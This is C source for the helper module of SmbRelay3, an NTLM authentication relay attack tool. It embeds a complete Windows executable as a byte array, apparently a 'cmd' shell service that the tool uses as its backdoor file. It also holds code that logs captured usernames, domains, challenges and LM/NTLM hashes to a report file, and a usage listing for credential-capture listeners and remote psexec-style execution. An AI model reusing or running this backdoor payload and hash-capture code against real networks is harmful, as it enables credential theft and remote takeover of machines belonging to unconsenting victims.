00001
00002
00003
00004
00005 #include "misc.h"
00006 #include "smbrelay.h"
00007
00008 extern int verbose;
00009 void DumpMem(void* string, int length) {
00010
00011 unsigned char *p = (unsigned char *) string;
00012 unsigned char lastrow_data[16];
00013 int rows = length / DBG_DUMP_ROWS;
00014 int lastrow = length % DBG_DUMP_ROWS;
00015 int i, j;
00016
00017
00018 for (i = 0; i < rows; i++) {
00019 printf("%04hx: ", i * 16);
00020 for (j = 0; j < DBG_DUMP_ROWS; j++) {
00021 printf("%02x ", p[(i * 16) + j]);
00022 if ( j==7 ){
00023 printf(" ");
00024 }
00025 }
00026 printf(" [ ");
00027 for (j = 0; j < DBG_DUMP_ROWS; j++) {
00028 if (isprint(p[(i * 16) + j]))
00029 printf("%c", p[(i * 16) + j]);
00030 else
00031 printf(".");
00032 }
00033 printf(" ]\n");
00034 }
00035 if (lastrow > 0) {
00036 memset(lastrow_data, 0, sizeof(lastrow_data));
00037 memcpy(lastrow_data, p + length - lastrow, lastrow);
00038 printf("%04hx: ", i * 16);
00039 for (j = 0; j < lastrow; j++) {
00040 printf("%02x ", p[(i * 16) + j]);
00041 if ( (j % 8 == 1) && (j!=1) )
00042 printf(" ");
00043 }
00044 while(j < DBG_DUMP_ROWS) {
00045 printf(" ");
00046 if (j % 8 == 1)
00047 printf(" ");
00048 j++;
00049 }
00050
00051 printf(" [ ");
00052 for (j = 0; j < lastrow; j++) {
00053 if (isprint(p[(i * 16) + j]))
00054 printf("%c", p[(i * 16) + j]);
00055 else
00056 printf(".");
00057 }
00058 while(j < DBG_DUMP_ROWS) {
00059 printf(" ");
00060 j++;
00061 }
00062
00063
00064 printf(" ]\n");
00065 }
00066 printf("\n");
00067
00068 }
00069
00070
00071
00072
00073 char *ReadFileToSend(int *BackdoorFileSize,char*lpBackdoorFile)
00074 {
00075 unsigned char SMRS[2048] = {
00076 0x4D, 0x5A, 0x90, 0x00, 0x03, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00, 0xFF, 0xFF, 0x00, 0x00,
00077 0xB8, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
00078 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
00079 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xD0, 0x00, 0x00, 0x00,
00080 0x0E, 0x1F, 0xBA, 0x0E, 0x00, 0xB4, 0x09, 0xCD, 0x21, 0xB8, 0x01, 0x4C, 0xCD, 0x21, 0x54, 0x68,
00081 0x69, 0x73, 0x20, 0x70, 0x72, 0x6F, 0x67, 0x72, 0x61, 0x6D, 0x20, 0x63, 0x61, 0x6E, 0x6E, 0x6F,
00082 0x74, 0x20, 0x62, 0x65, 0x20, 0x72, 0x75, 0x6E, 0x20, 0x69, 0x6E, 0x20, 0x44, 0x4F, 0x53, 0x20,
00083 0x6D, 0x6F, 0x64, 0x65, 0x2E, 0x0D, 0x0D, 0x0A, 0x24, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
00084 0x2F, 0xB0, 0x55, 0xC4, 0x6B, 0xD1, 0x3B, 0x97, 0x6B, 0xD1, 0x3B, 0x97, 0x6B, 0xD1, 0x3B, 0x97,
00085 0x4C, 0x17, 0x46, 0x97, 0x6A, 0xD1, 0x3B, 0x97, 0x6B, 0xD1, 0x3A, 0x97, 0x6C, 0xD1, 0x3B, 0x97,
00086 0xA8, 0xDE, 0x66, 0x97, 0x6E, 0xD1, 0x3B, 0x97, 0x4C, 0x17, 0x55, 0x97, 0x6A, 0xD1, 0x3B, 0x97,
00087 0x4C, 0x17, 0x43, 0x97, 0x6A, 0xD1, 0x3B, 0x97, 0x52, 0x69, 0x63, 0x68, 0x6B, 0xD1, 0x3B, 0x97,
00088 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
00089 0x50, 0x45, 0x00, 0x00, 0x4C, 0x01, 0x02, 0x00, 0x3E, 0x48, 0xFF, 0x47, 0x00, 0x00, 0x00, 0x00,
00090 0x00, 0x00, 0x00, 0x00, 0xE0, 0x00, 0x03, 0x01, 0x0B, 0x01, 0x08, 0x00, 0x00, 0x02, 0x00, 0x00,
00091 0x00, 0x02, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x10, 0x00, 0x00, 0x00, 0x10, 0x00, 0x00,
00092 0x00, 0x20, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x10, 0x00, 0x00, 0x00, 0x02, 0x00, 0x00,
00093 0x04, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
00094 0x00, 0x30, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x02, 0x00, 0x00, 0x04,
00095 0x00, 0x00, 0x10, 0x00, 0x00, 0x10, 0x00, 0x00, 0x00, 0x00, 0x10, 0x00, 0x00, 0x10, 0x00, 0x00,
00096 0x00, 0x00, 0x00, 0x00, 0x10, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
00097 0x5C, 0x20, 0x00, 0x00, 0x3C, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
00098 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
00099 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
00100 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
00101 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
00102 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x20, 0x00, 0x00, 0x24, 0x00, 0x00, 0x00,
00103 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
00104 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x2E, 0x74, 0x65, 0x78, 0x74, 0x00, 0x00, 0x00,
00105 0x4B, 0x01, 0x00, 0x00, 0x00, 0x10, 0x00, 0x00, 0x00, 0x02, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00,
00106 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x20, 0x00, 0x00, 0x60,
00107 0x2E, 0x72, 0x64, 0x61, 0x74, 0x61, 0x00, 0x00, 0xF6, 0x00, 0x00, 0x00, 0x00, 0x20, 0x00, 0x00,
00108 0x00, 0x02, 0x00, 0x00, 0x00, 0x06, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
00109 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
00110 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
00111 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
00112 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
00113 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
00114 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
00115 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
00116 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
00117 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
00118 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
00119 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
00120 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
00121 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
00122 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
00123 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
00124 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
00125 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
00126 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
00127 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
00128 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
00129 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
00130 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
00131 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
00132 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
00133 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
00134 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
00135 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
00136 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
00137 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
00138 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
00139 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
00140 0x55, 0x8B, 0xEC, 0x81, 0xEC, 0xF4, 0x01, 0x00, 0x00, 0x53, 0x56, 0x57, 0x8D, 0x85, 0x0C, 0xFE,
00141 0xFF, 0xFF, 0x50, 0x68, 0x01, 0x01, 0x00, 0x00, 0xFF, 0x15, 0x10, 0x20, 0x40, 0x00, 0x33, 0xF6,
00142 0x56, 0x56, 0x56, 0x6A, 0x06, 0x6A, 0x01, 0x6A, 0x02, 0xFF, 0x15, 0x0C, 0x20, 0x40, 0x00, 0x8B,
00143 0xF8, 0x6A, 0x10, 0x8D, 0x45, 0xF0, 0x50, 0x57, 0x66, 0xC7, 0x45, 0xF0, 0x02, 0x00, 0x66, 0xC7,
00144 0x45, 0xF2, 0x1F, 0x90, 0x89, 0x75, 0xF4, 0xFF, 0x15, 0x08, 0x20, 0x40, 0x00, 0x6A, 0x01, 0x57,
00145 0xFF, 0x15, 0x14, 0x20, 0x40, 0x00, 0x56, 0x8D, 0x45, 0xF0, 0x50, 0x57, 0xFF, 0x15, 0x18, 0x20,
00146 0x40, 0x00, 0x56, 0xBB, 0x28, 0x20, 0x40, 0x00, 0x53, 0x8B, 0xF8, 0xE8, 0x50, 0x00, 0x00, 0x00,
00147 0x59, 0x50, 0x53, 0x57, 0xFF, 0x15, 0x1C, 0x20, 0x40, 0x00, 0x8D, 0x45, 0x9C, 0x50, 0x8D, 0x45,
00148 0xAC, 0x50, 0x56, 0x56, 0x56, 0x6A, 0x01, 0x56, 0x56, 0x68, 0x24, 0x20, 0x40, 0x00, 0x56, 0xC7,
00149 0x45, 0xAC, 0x44, 0x00, 0x00, 0x00, 0x66, 0x89, 0x75, 0xDC, 0xC7, 0x45, 0xD8, 0x01, 0x01, 0x00,
00150 0x00, 0x89, 0x7D, 0xEC, 0x89, 0x7D, 0xE8, 0x89, 0x7D, 0xE4, 0x89, 0x75, 0xB8, 0x89, 0x75, 0xB4,
00151 0x89, 0x75, 0xE0, 0xFF, 0x15, 0x00, 0x20, 0x40, 0x00, 0x5F, 0x5E, 0x5B, 0xC9, 0xC2, 0x10, 0x00,
00152 0x8B, 0x4C, 0x24, 0x04, 0xF7, 0xC1, 0x03, 0x00, 0x00, 0x00, 0x74, 0x24, 0x8A, 0x01, 0x83, 0xC1,
00153 0x01, 0x84, 0xC0, 0x74, 0x4E, 0xF7, 0xC1, 0x03, 0x00, 0x00, 0x00, 0x75, 0xEF, 0x05, 0x00, 0x00,
00154 0x00, 0x00, 0x8D, 0xA4, 0x24, 0x00, 0x00, 0x00, 0x00, 0x8D, 0xA4, 0x24, 0x00, 0x00, 0x00, 0x00,
00155 0x8B, 0x01, 0xBA, 0xFF, 0xFE, 0xFE, 0x7E, 0x03, 0xD0, 0x83, 0xF0, 0xFF, 0x33, 0xC2, 0x83, 0xC1,
00156 0x04, 0xA9, 0x00, 0x01, 0x01, 0x81, 0x74, 0xE8, 0x8B, 0x41, 0xFC, 0x84, 0xC0, 0x74, 0x32, 0x84,
00157 0xE4, 0x74, 0x24, 0xA9, 0x00, 0x00, 0xFF, 0x00, 0x74, 0x13, 0xA9, 0x00, 0x00, 0x00, 0xFF, 0x74,
00158 0x02, 0xEB, 0xCD, 0x8D, 0x41, 0xFF, 0x8B, 0x4C, 0x24, 0x04, 0x2B, 0xC1, 0xC3, 0x8D, 0x41, 0xFE,
00159 0x8B, 0x4C, 0x24, 0x04, 0x2B, 0xC1, 0xC3, 0x8D, 0x41, 0xFD, 0x8B, 0x4C, 0x24, 0x04, 0x2B, 0xC1,
00160 0xC3, 0x8D, 0x41, 0xFC, 0x8B, 0x4C, 0x24, 0x04, 0x2B, 0xC1, 0xC3, 0x00, 0x00, 0x00, 0x00, 0x00,
00161 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
00162 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
00163 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
00164 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
00165 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
00166 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
00167 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
00168 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
00169 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
00170 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
00171 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
00172 0xD6, 0x20, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x02, 0x00, 0x00, 0x80, 0xBC, 0x20, 0x00, 0x00,
00173 0x73, 0x00, 0x00, 0x80, 0x0D, 0x00, 0x00, 0x80, 0x01, 0x00, 0x00, 0x80, 0x13, 0x00, 0x00, 0x80,
00174 0x00, 0x00, 0x00, 0x00, 0x63, 0x6D, 0x64, 0x00, 0x53, 0x6D, 0x62, 0x52, 0x65, 0x6C, 0x61, 0x79,
00175 0x33, 0x20, 0x53, 0x68, 0x65, 0x6C, 0x6C, 0x20, 0x53, 0x65, 0x72, 0x76, 0x69, 0x63, 0x65, 0x20,
00176 0x2D, 0x20, 0x68, 0x74, 0x74, 0x70, 0x3A, 0x2F, 0x2F, 0x77, 0x77, 0x77, 0x2E, 0x74, 0x61, 0x72,
00177 0x61, 0x73, 0x63, 0x6F, 0x2E, 0x6F, 0x72, 0x67, 0x20, 0x0A, 0x0A, 0x00, 0xA0, 0x20, 0x00, 0x00,
00178 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xCA, 0x20, 0x00, 0x00, 0x08, 0x20, 0x00, 0x00,
00179 0x98, 0x20, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xE8, 0x20, 0x00, 0x00,
00180 0x00, 0x20, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
00181 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xD6, 0x20, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
00182 0x02, 0x00, 0x00, 0x80, 0xBC, 0x20, 0x00, 0x00, 0x73, 0x00, 0x00, 0x80, 0x0D, 0x00, 0x00, 0x80,
00183 0x01, 0x00, 0x00, 0x80, 0x13, 0x00, 0x00, 0x80, 0x00, 0x00, 0x00, 0x00, 0x41, 0x00, 0x57, 0x53,
00184 0x41, 0x53, 0x6F, 0x63, 0x6B, 0x65, 0x74, 0x41, 0x00, 0x00, 0x57, 0x53, 0x32, 0x5F, 0x33, 0x32,
00185 0x2E, 0x64, 0x6C, 0x6C, 0x00, 0x00, 0x66, 0x00, 0x43, 0x72, 0x65, 0x61, 0x74, 0x65, 0x50, 0x72,
00186 0x6F, 0x63, 0x65, 0x73, 0x73, 0x41, 0x00, 0x00, 0x4B, 0x45, 0x52, 0x4E, 0x45, 0x4C, 0x33, 0x32,
00187 0x2E, 0x64, 0x6C, 0x6C, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
00188 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
00189 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
00190 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
00191 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
00192 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
00193 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
00194 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
00195 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
00196 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
00197 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
00198 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
00199 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
00200 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
00201 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
00202 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
00203 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00
00204 };
00205 FILE *fp=fopen(lpBackdoorFile,"rb");
00206 char *buffer;
00207 int len;
00208 if (!fp) {
00209 printf("[-] %s not found. using cached version\n",lpBackdoorFile);
00210 buffer=(char *)malloc(sizeof(SMRS));
00211 memcpy(buffer,SMRS,sizeof(SMRS));
00212 return(buffer);
00213 }
00214 fseek(fp,0,SEEK_END);
00215 len=ftell(fp);
00216 *BackdoorFileSize=len;
00217 fseek(fp,0,SEEK_SET);
00218 buffer=(char*)malloc(len);
00219 fread(buffer,len,1,fp);
00220 fclose(fp);
00221 return(buffer);
00222 }
00223
00224
00225 int ConnectToRemoteHost(RELAY *relay,char *hostname, int port)
00226 {
00227 #ifdef WIN32
00228 u_long tmp=1;
00229 #else
00230 int tmp=1;
00231 #endif
00232 fd_set fds;
00233 struct timeval tv;
00234 struct hostent *hostend;
00235 int i;
00236
00237 relay->destinationaddr.sin_family = AF_INET;
00238 relay->destinationaddr.sin_addr.s_addr = inet_addr(hostname);
00239 if (relay->destinationaddr.sin_addr.s_addr == INADDR_NONE)
00240 {
00241 hostend=gethostbyname(hostname);
00242 if (!hostend)
00243 {
00244 return(0);
00245 }
00246 memcpy(&relay->destinationaddr.sin_addr.s_addr, hostend->h_addr, 4);
00247 printf("[+] Remote Server %s resolved as %s\n",hostname,inet_ntoa(relay->destinationaddr.sin_addr));
00248 }
00249 strcpy(relay->hostname,hostname);
00250 relay->destinationaddr.sin_port = htons(port);
00251 relay->destination=socket(AF_INET, SOCK_STREAM, 0);
00252
00253 #ifdef WIN32
00254 ioctlsocket(relay->destination, FIONBIO, &tmp);
00255 #else
00256 ioctl(relay->destination, FIONBIO, (char *)&tmp);
00257 #endif
00258 tv.tv_sec = CONNECT_TIMEOUT;
00259 tv.tv_usec = 0;
00260 FD_ZERO(&fds);
00261 FD_SET(relay->destination, &fds);
00262
00263
00264 connect(relay->destination,(struct sockaddr *)&relay->destinationaddr, sizeof(relay->destinationaddr));
00265 i=select((int)relay->destination+1,0,&fds,0,&tv);
00266 if (i<=0){
00267 printf("[-] Error - Connection against %s:%i Failed\n",hostname,port);
00268 return(0);
00269 }
00270 tmp=0;
00271 #ifdef WIN32
00272 ioctlsocket( relay->destination, FIONBIO, &tmp);
00273 #else
00274 ioctl(relay->destination, FIONBIO, (char *)&tmp);
00275 #endif
00276 return(1);
00277 }
00278
00279
00280 int SendBytesAndWaitForResponse(SOCKET destination,char *source, int nBytes, char *destinationBuffer, int MaxReadSize,int timeout)
00281 {
00282 int i=-1;
00283 #ifdef WIN32
00284 u_long tmp=1;
00285 #else
00286 int tmp=1;
00287 #endif
00288 fd_set fds;
00289 struct timeval tv;
00290
00291 if (debug) {
00292 printf("Sending..\n");
00293 DumpMem(source,nBytes);
00294 }
00295
00296
00297 if (timeout>0)
00298 {
00299 #ifdef WIN32
00300 ioctlsocket(destination, FIONBIO, &tmp);
00301 #else
00302 ioctl(destination, FIONBIO, (char *)&tmp);
00303 #endif
00304 send(destination, source, nBytes,0);
00305 tv.tv_sec = timeout;
00306 tv.tv_usec = 0;
00307 FD_ZERO(&fds);
00308 FD_SET(destination, &fds);
00309
00310 i=select((int)destination+1,&fds,0,0,&tv);
00311
00312 if (i<=0) return(-1);
00313 } else {
00314 send(destination, source, nBytes,0);
00315 }
00316 i=recv(destination, (char *)destinationBuffer, MaxReadSize, 0);
00317 if (timeout>0)
00318 {
00319 tmp=0;
00320 #ifdef WIN32
00321 ioctlsocket(destination, FIONBIO, &tmp);
00322 #else
00323 ioctl(destination, FIONBIO, (char *)&tmp);
00324 #endif
00325 }
00326 if (debug)
00327 {
00328 printf("[*] received: %i bytes\n",i);
00329 DumpMem(destinationBuffer,i);
00330 }
00331
00332
00333 return(i);
00334 }
00335
00336 void WriteDataToReportFile(char *lpLogFileFilename, tSmbNtlmAuthResponse* NtlmAuthResponse, char *SourceIpAddress,unsigned char *challenge)
00337 {
00338 char buffer[1024];
00339 char tmp[256];
00340 FILE *LogFile=NULL;
00341 char UserName[256];
00342 char Domain[256];
00343 char Workstation[256];
00344 unsigned char *p;
00345 int i;
00346
00347
00348 LogFile=fopen(lpLogFileFilename,"a+");
00349 strcpy(tmp,"#SOURCEIPADDRESS:DOMAIN:WORKSTATION:USERNAME:challenge:LMHASH:NTLMHASH\n");
00350 fwrite(tmp,strlen(tmp),1,LogFile);
00351
00352 GetNTLMPacketInfo(NtlmAuthResponse,(char*)&UserName, (char*)&Domain, (char*)&Workstation,0);
00353 sprintf(buffer,"%s:%s:%s:%s:",SourceIpAddress,Domain,Workstation,UserName);
00354
00355 sprintf(tmp,"%2.2x%2.2x%2.2x%2.2x%2.2x%2.2x%2.2x%2.2x:",challenge[0],challenge[1],challenge[2],challenge[3],challenge[4],challenge[5],challenge[6],challenge[7]);
00356 strcat(buffer,tmp);
00357
00358 p=(unsigned char *)NtlmAuthResponse + NtlmAuthResponse->lmResponse.offset;
00359
00360
00361 for(i=0;i<24;i++) {sprintf(tmp,"%2.2x",p[i]); strcat(buffer,tmp); }
00362 strcat(buffer,":");
00363
00364 p=(unsigned char *)NtlmAuthResponse + NtlmAuthResponse->ntResponse.offset;
00365 for(i=0;i<24;i++) {sprintf(tmp,"%2.2x",p[i]); strcat(buffer,tmp); }
00366 fwrite(buffer,strlen(buffer),1,LogFile);
00367 fclose(LogFile);
00368
00369
00370 }
00371
00372
00373 void CleanLine(int verbose)
00374 {
00375 if (verbose>0) printf("\n");
00376 else printf(" \r");
00377 }
00378
00379
00380 void Banner(void)
00381 {
00382 printf("SmbRelay3 - NTLM Authentication replay attacks\n");
00383 printf(" (c) 2007 - 2008 Andres & Miguel Tarasco \n");
00384 printf(" Web Site - http://www.tarasco.org\n\n");
00385 }
00386
00387 void usage(void){
00388
00389 printf("Usage: SMBRelay3.exe <binding> [options]\n\n");
00390 printf("Binding Parameters:\n");
00391 printf(" --ListForSMBRequests (Wait for incomming connections against port 445)\n");
00392 printf(" --ListForHTTPRequests (Wait for incomming connections against port 80)\n");
00393 printf(" --ListForSMTPRequests (Wait for incomming connections against port 25)\n");
00394 printf(" --ListForIMAPRequests (Wait for incomming connections against port 143)\n");
00395 printf(" --ListForPOP3Requests (Wait for incomming connections against port 110)\n");
00396 printf(" --psexec <host> <username> <password> (psexec like tool)\n");
